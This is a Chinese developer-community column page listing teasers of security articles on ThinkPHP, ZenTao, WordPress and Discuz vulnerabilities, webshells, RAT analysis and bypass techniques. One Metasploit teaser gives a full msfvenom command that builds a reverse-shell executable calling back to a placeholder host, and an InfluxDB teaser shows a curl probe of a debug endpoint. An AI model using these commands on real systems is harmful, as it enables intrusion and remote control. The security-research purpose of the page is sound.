腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
首页
学习
活动
专区
工具
TVP
最新优惠活动
返回腾讯云官网
黑白安全
黑白网成立于2014年,基于丰富的技术和经验,提供各类技术性动态。官网:heibai.org.cn
专栏成员
举报
1299
文章
2269561
阅读量
251
订阅数
订阅专栏
申请加入专栏
全部文章(999+)
安全(414)
网络安全(315)
其他(305)
黑客(161)
php(108)
网站(89)
windows(86)
编程算法(85)
https(83)
数据库(72)
http(67)
tcp/ip(61)
shell(57)
sql(54)
linux(52)
html(46)
github(42)
人工智能(42)
开源(42)
java(41)
git(37)
python(36)
api(35)
安全漏洞(35)
存储(32)
微信(29)
腾讯云测试服务(26)
dns(25)
搜索引擎(24)
云数据库 SQL Server(23)
ddos(23)
android(22)
访问管理(22)
区块链(21)
ios(19)
javascript(18)
企业(18)
比特币(17)
游戏(17)
缓存(16)
文件存储(15)
自动化(15)
apache(12)
物联网(12)
网站渗透测试(12)
tomcat(11)
大数据(11)
数据分析(11)
xml(10)
json(10)
打包(10)
windows server(10)
thinkphp(10)
ftp(10)
powershell(10)
bash(9)
.net(9)
单片机(9)
ubuntu(9)
分布式(9)
asp(9)
udp(9)
nginx(8)
容器镜像服务(8)
access(7)
unix(7)
深度学习(7)
运维(7)
爬虫(7)
ssh(7)
费用中心(6)
数字货币(6)
机器学习(6)
iphone(6)
go(6)
css(6)
jquery(6)
神经网络(6)
命令行工具(6)
短信(6)
容器(6)
seo(6)
cdn(6)
网站建设(6)
云镜(主机安全)(5)
人脸识别(5)
mac os(5)
c++(5)
jsp(5)
oracle(5)
ide(5)
正则表达式(5)
erp(5)
flash(5)
iis(5)
验证码(5)
漏洞扫描服务(5)
actionscript(4)
node.js(4)
bash 指令(4)
apt-get(4)
VPN 连接(4)
检测工具(4)
jdk(4)
wordpress(4)
npm(4)
机器人(4)
数据结构(4)
nat(4)
facebook(4)
隐私(4)
负载均衡(3)
swift(3)
ruby(3)
ajax(3)
memcached(3)
svn(3)
负载均衡缓存(3)
SSL 证书(3)
图像处理(3)
gui(3)
unity(3)
grep(3)
kernel(3)
小程序(3)
云计算(3)
c#(2)
lua(2)
vbscript(2)
qt(2)
composer(2)
云数据库 Redis(2)
vba(2)
jar(2)
maven(2)
analyzer(2)
delphi(2)
云函数(2)
云数据迁移(2)
DevOps 解决方案(2)
电商(2)
数据安全(2)
serverless(2)
压力测试(2)
html5(2)
rpc(2)
gcc(2)
lamp(2)
ntp(2)
微服务(2)
腾讯云开发者社区(2)
虚拟化(2)
drupal(2)
app(2)
exe(2)
md5(2)
加密(2)
手机(2)
DNS 解析 DNSPod(1)
NLP 服务(1)
自动驾驶(1)
xcode(1)
perl(1)
servlet(1)
jquery ui(1)
ecmascript(1)
webview(1)
汇编语言(1)
arm(1)
嵌入式(1)
postgresql(1)
phpmyadmin(1)
django(1)
flask(1)
eclipse(1)
struts(1)
spring(1)
NAT 网关(1)
物联网通信(1)
文字识别(1)
数字营销(1)
mongodb(1)
金融(1)
o2o(1)
出行(1)
移动开发(1)
kubernetes(1)
图像识别(1)
yum(1)
sql server(1)
推荐系统(1)
markdown(1)
jenkins(1)
socket编程(1)
lnmp(1)
hexo(1)
kerberos(1)
haskell(1)
云数据库 postgresql(1)
信息流(1)
防火墙(1)
密钥管理服务(1)
安全治理(1)
5g(1)
unicode(1)
ascii(1)
ipv6(1)
groovy(1)
app测试(1)
实时监控(1)
flink(1)
flarum(1)
安全.(1)
应急响应服务(1)
攻击面管理(1)
云安全中心(1)
Elasticsearch Service(1)
discuz!(1)
amp(1)
apply(1)
asterisk(1)
bat(1)
branch(1)
channel(1)
dll(1)
dp(1)
dump(1)
find(1)
foursquare(1)
function(1)
gif(1)
gmail(1)
google(1)
instagram(1)
ip(1)
jpeg(1)
nlp(1)
ode(1)
onclick(1)
oop(1)
pdb(1)
pid(1)
policy(1)
private(1)
runtime(1)
sip(1)
svm(1)
sys(1)
thinkphp5(1)
uber(1)
usb(1)
version(1)
voice(1)
wifi(1)
wiki(1)
window(1)
youtube(1)
zero(1)
测试(1)
服务器(1)
工具(1)
管理(1)
集合(1)
集群(1)
计算机(1)
教程(1)
漏洞(1)
内核(1)
配置(1)
苹果(1)
软件(1)
搜索(1)
网络(1)
效率(1)
源码(1)
主机(1)
搜索文章
搜索
搜索
关闭
Thinkphp漏洞复现总结
网络安全
安全
thinkphp
php
sql
Thinkphp简介ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC
C4rpeDime
2022-04-26
2.7K
0
禅道系统
网络安全
安全
php
编程算法
网站
登陆管理后台的恶意攻击者可以通过fopen/fread/fwrite方法读取或上传任意文件,成功利用此漏洞可以读取目标系统敏感文件或获得系统管理权限。1、前言百度云安全团队监测到国产开源项目管理软件禅道官方发布了文件上传漏洞的风险通告,该漏洞编号为CNVD-C-2020-121325,漏洞影响禅道<=12.4.2版本。登陆管理后台的恶意攻击者可以通过f
C4rpeDime
2022-04-26
1.3K
0
WordPress插件漏洞分析:WPDiscuz任意文件上传漏洞
网络安全
安全
php
wordpress
网站建设
写在前面的话就在不久之前,Wordfence的威胁情报团队在一款名叫wpDiscuz的Wordpress评论插件中发现了一个高危漏洞,而这款插件目前已有超过80000个网站在使用了。这个漏洞将允许未经认证的攻击者在目标站点中上传任意文件,其中也包括PHP文件,该漏洞甚至还允许攻击者在目标站点的服务器中实现远程代码执行。漏洞简述漏洞描述:任意文件上传受影响插件
C4rpeDime
2022-04-26
866
0
针对宝塔的RASP及其disable_functions的绕过
php
unix
linux
0x01 实验环境开启宝塔自带的防跨站攻击。安装并开启堡塔PHP安全防护。安装并开启堡塔防提权。0x02 概述无聊的时候和宝塔开发聊天,听他说了宝塔在开发一个基于底层的rasp,拦截所有基于www权限的命令执行。最近总算上线了,我稍微测试了一下,效果确实不错:不管是通过php来调用system,会拦截,你是root权限的情况下,通过su www都会被一并拦截
C4rpeDime
2022-04-26
1K
0
从PbootCMS审计到某狗绕过
企业
编程算法
腾讯云测试服务
php
这是 酒仙桥六号部队 的第 26 篇文章。全文共计2033个字,预计阅读时长8分钟。之前审计发现的PbootCMS2.0.3前台RCE,看了最近的版本更新漏洞被修复了,就放出之前的POC顺便看看能不能绕过补丁。 项目地址:https://github.com/hnaoyun/PbootCMS PbootCMS自己实现了一个模板标签功能,在解析{pboot:i
C4rpeDime
2022-04-26
1.2K
0
都0202年了老嗨还在用的 - 各种姿势jsp webshell
shell
网站
jar
jsp
php
最近,我的朋友“老嗨”,他参加了一个某云举办的号称可能史上最强的使用了AI技术的WebShell检测系统挑战赛...因为我没什么时间去搞这个,所以,我把我珍藏多年,姿势比较多的jsp webshell发给了老嗨,老嗨跟我说,全部bypass了,但最后的结果非常惨烈,有被抢了的,有的因为没适配windows导致降级的,也有因为裁判机使用了openjdk亦或者他根本不会java瞎配的classpath导致不能运行的,惨惨。
C4rpeDime
2022-04-26
6K
0
ShellReset RAT 利用基于恶意宏的 word 文档传播
.net
php
api
编程算法
5g
正如我们在以前的博客中提到的那样,网络犯罪分子通常会将其攻击与时事联系起来。因此,不足为奇的是,我们注意到其中的另一个,其中一个特别使用伦敦的技术事件作为诱饵。
C4rpeDime
2022-04-26
1.2K
0
对某灰色产业cms审计|云购CMS
php
企业
网络安全
安全
嘿嘿嘿,这是xDay团队的第一篇反黑灰产业的代码审计文章。这次给大家看的是一个曾经风靡一时的一元云购的一套程序。我就纳闷儿了...这玩意儿现在还在骗人??于是乎就开始着手挖几个洞。
C4rpeDime
2022-04-26
2.9K
0
TP6.0反序列化利用链挖掘思路总结
文件存储
java
thinkphp
php
缓存
最近CTF中TP反序列化考的比较频繁,从前段时间的N1CTF到最近的安洵杯都利用了thinkphp反序列化,疯狂填坑,审计挖掘了下TP5、TP6反序列化中的利用链,本篇主要总结下TP6利用链的挖掘思路。小白文章,大佬们请略过。。。
C4rpeDime
2022-04-26
1.7K
0
thinkphp v6.0.x 反序列化利用链挖掘
文件存储
composer
java
编程算法
php
0x00 前言上一篇分析了tp 5.2.x的反序列化利用链挖掘,顺着思路,把tp6.0.x也挖了。有类似的地方,也有需要重新挖掘的地方。 0x01 环境准备采用composer安装6.0.*-dev版本composer create-project topthink/think=6.0.x-dev v6.0 0x02 利用链分析背景回顾拿到v6.0.x版本,
C4rpeDime
2022-04-26
463
0
禅道全版本rce漏洞分析
网络安全
安全
编程算法
api
php
禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。 厂商官网:https://www.zentao.net/ 而此次发现的漏洞正是ZenTaoPHP框架中的通用代码所造成的的,因此禅道几乎所有的项目都受此漏洞影响。
C4rpeDime
2022-04-26
12.6K
2
基于URL跳转与XSS组合利用的钓鱼分析(以QQ空间某恶意链接为例)
php
https
网络安全
安全
html
写在前面本案例写于6月30日(HW收尾阶段),当时本想着发出来。结果忙着忙着就忘了… 今天看到先知社区上有写一篇也是关于QQ空间恶意跳转,感觉他写的这块和我碰上的有些差异,故拿出来说一说~分析该恶意链
C4rpeDime
2022-04-26
628
0
腾讯QQ快速登录漏洞
安全
https
网络安全
php
前言一婊哥说他把这洞提交给腾讯,腾讯说没有危害还说会修复,修复就修复还不给 Rank (婊哥还说腾讯就想白P)正文今天我想着到来写点日记。。毕竟总是忘了这忘了那的。然后打开我亲爱的有道云.点了下QQ快速登录。。发现。。调用失败?我有点气急败坏,毕竟我这个人太懒了,基本上很多应用都是直接QQ快速登录…然后一般也不会重新设置密码.所以我没登陆成功我的有道云…于是
C4rpeDime
2022-04-26
5.8K
0
Metasploit笔记
windows
php
tcp/ip
msfvenom -p windows/Meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe
C4rpeDime
2022-04-26
459
0
漏洞分析 | Discuz! ML V3.X 代码注入漏洞
php
安全
discuz!
http
网络安全
Discuz!ML V3.X 代码注入分析代码来源:http://discuz.ml/download作者:Web安全组-CoolCat漏洞定位在PoC的代码中填充'.1.'使得代码出错,定位出错代码文件:代码报错根据报错跟踪到source/module/portal/portal_index.php第32行portal_index.php
C4rpeDime
2022-04-26
1.3K
0
CVE-2019-13139 - Docker构建代码执行
git
github
开源
php
linux
在今年早些时候,我在2019年的部队进行了一些研究,其中我检查了构建系统以及git如何导致安全问题,我在Docker中发现了一个与git相关的漏洞。此漏洞已被分配为CVE-2019-13139,并在Docker引擎更新18.09.4中进行了修补。问题是相对直接的命令注入,然而,它可能使它更有趣的是它发生在Go代码库中。通常假设Go os/exec包没有遭受命
C4rpeDime
2022-04-26
1K
0
Zblog对接QQ机器人实现文章搜索与最新文章
机器人
api
php
企业
网站建设
z-blog和z-blogphp,既是博客程序,也是cms建站系统。已走过十余年风雨的她们,有着强大的可定制性、丰富的插件接口和独立的主题模板,致力于给国内用户提供优秀的博客写作体验。黑白网本身用的也
C4rpeDime
2022-04-26
378
0
influxdb认证绕过0day
http
php
json
C++url -G "http://xxx:8086/Debug/requests"
C4rpeDime
2022-04-25
440
0
滥用jQuery进行CSS驱动的定时攻击
jquery
css
php
网站
安全
Arthur Saftnes去年做了一些关于使用jQuery CSS选择器进行计时攻击的非常棒的研究,事实上它可能是去年我最喜欢的博客文章。
C4rpeDime
2022-04-25
1.1K
0
Google Hacking 教你找女神 google hack 谷歌黑客
php
毫无疑问,黑客们都喜欢用高贵冷艳的 Google,但是度娘也不是一无是处。比如,度娘对中文的智能语义化处理就比 Google 强多了。另外,度娘的贴吧、网盘可都是好资源,藏着巨大的秘密。
C4rpeDime
2022-04-24
710
0
点击加载更多
社区活动
【纪录片】中国数据库前世今生
穿越半个世纪,探寻中国数据库50年的发展历程
立即查看
Python精品学习库
代码在线跑,知识轻松学
立即查看
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
立即体验
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
立即查看
领券
问题归档
专栏文章
快讯文章归档
关键词归档
开发者手册归档
开发者手册 Section 归档
